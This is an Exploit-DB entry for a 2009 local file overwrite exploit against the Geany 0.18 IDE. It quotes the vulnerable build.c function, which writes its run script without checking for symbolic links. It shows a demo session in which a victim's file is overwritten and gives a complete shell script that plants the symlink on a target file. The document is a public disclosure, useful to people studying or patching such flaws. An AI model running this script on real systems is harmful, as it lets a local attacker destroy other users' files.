Geany .18 - Local File Overwrite

EDB-ID:

10060

CVE:

N/A

EDB Verified:

Author:

Jeremy Brown

Type:

local

Exploit:   /  

Platform:

Linux

Date:

2009-10-06

Vulnerable App: 
#!/bin/sh
# redbull.sh
# AKA
# Geany 0.18 Local File Overwrite Exploit
#
# Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 10.06.2009
#
# *********************************************************************************************************
# I was checking out some IDEs and decided on Geany. Nice interface, good features, but it doesn't defend
# against symbolic links when writing the run script used for executing files after compiliation.
#
# geany-0.18/src/build.c
#
# LINES 981-1010
#
# static gboolean build_create_shellscript(const gchar *fname, const gchar *cmd, gboolean autoclose)
# {
# 	FILE *fp;
# 	gchar *str;
# #ifdef G_OS_WIN32
# 	gchar *expanded_cmd;
# #endif
# 
# 	fp = g_fopen(fname, "w");
# 	if (! fp)
# 		return FALSE;
# #ifdef G_OS_WIN32
# 	/* Expand environment variables like %blah%. */
# 	expanded_cmd = win32_expand_environment_variables(cmd);
# 	str = g_strdup_printf("%s\n\n%s\ndel \"%%0\"\n\npause\n", expanded_cmd, (autoclose) ? "" : "pause");
# 	g_free(expanded_cmd);
# #else
# 	str = g_strdup_printf(
# 		"#!/bin/sh\n\n%s\n\necho \"\n\n------------------\n(program exited with code: $?)\" \
# 		\n\n%s\n", cmd, (autoclose) ? "" :
# 		"\necho \"Press return to continue\"\n#to be more compatible with shells like dash\ndummy_var=\"\"\nread dummy_var");
# #endif
#
# 	fputs(str, fp);
# 	g_free(str);
#
# 	fclose(fp);
#
# 	return TRUE;
# }
#
# Not a big deal since the script is generated in the working directory that Geany is executing the compiled
# program, but, none the less exploitable if the attacker can create a symbolic link in the working directory.
#
# linux@ubuntu:~$ ls -al important
# -rwx------ 1 linux linux 5 2009-10-06 14:10 important
# linux@ubuntu:~$ cat important
# *data*
# linux@ubuntu:~$
#
# hacker@linux:~$ sh redbull.sh /tmp /home/linux/important
#
# Geany 0.18 Local File Overwrite Exploit
#
# [*] Creating symbolic link from /tmp/geany_run_script.sh to /home/linux/important...
#
# [*] /home/linux/important should be overwritten when Geany executes a program in /tmp
#
# hacker@linux:~$
#
# ***** Geany executes a program in /tmp *****
#
# linux@ubuntu:~$ cat important
# #!/bin/sh
#
# rm $0
#
# "./c"
#
# echo "
#
# ------------------
# (program exited with code: $?)" 		
#
#
# echo "Press return to continue"
# #to be more compatible with shells like dash
# dummy_var=""
# read dummy_var
# linux@ubuntu:~$
#
# Due to an Ubuntu's bug reporting system handler's possible lack of zeal (they argued overwriting the
# instruction pointer in a program when parsing a file format isn't a security issue because the program
# also interepts shell commands), I'm not very excited to try and work with them too much these days...
# *********************************************************************************************************
# redbull.sh

FILE=geany_run_script.sh

if [ "$2" = "" ]; then
echo
echo "Geany 0.18 Local File Overwrite Exploit"
echo
echo "Usage:   $0 </target/working/dir> <file.to.overwrite>"
echo "Example: $0 /tmp /home/user/important"
echo
exit
fi

echo
echo "Geany 0.18 Local File Overwrite Exploit"
echo
echo "[*] Creating symbolic link from $1/$FILE to $2..."
ln -s $2 $1/$FILE
echo
echo "[*] $2 should be overwritten when Geany executes a program in $1"
echo
exit
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services